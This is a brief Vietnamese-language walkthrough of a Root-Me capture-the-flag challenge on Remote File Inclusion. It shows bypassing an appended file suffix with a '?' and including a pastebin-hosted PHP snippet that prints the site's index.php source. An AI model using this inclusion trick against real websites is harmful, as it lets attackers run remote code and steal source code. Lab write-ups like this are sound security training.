Remote File Inclusion¶

Estimated time to read: 2 minutes

May 12, 2023

Tài nguyên và link challenge¶

Tài nguyên của challenge này tại https://www.root-me.org/en/Challenges/Web-Server/Remote-File-Inclusion

Link challenge này tại challenge01.root-me.org/web-serveur/ch13/

Tổng quan¶

Trong challenge này, mục tiêu của ta là lấy được source code php.

Kịch bản tấn công¶

Sau một hồi fuzzing website ta biết được khi nó query tại lang = ... thì nó tự động thêm _lang.php vào sau, ta sẽ phải tìm cách bypass nó. Với lại vì đây là challenge RFI nên ta cũng cần phải tìm 1 website khác để remote từ xa. Đó là ý tưởng :3. Sau một hồi google thì ta phải filter bằng dấu ? để có thể ngắt việc thêm _lang.php vào sau

Roài, ta sẽ tìm cách lấy sourcecode web bằng việc tiêm https://pastebin.com/raw/wq4ca9ak vào với nội dung file text là

1
2
3

<?php
echo show_source("index.php");
?>

Ta nhận được flag

Comments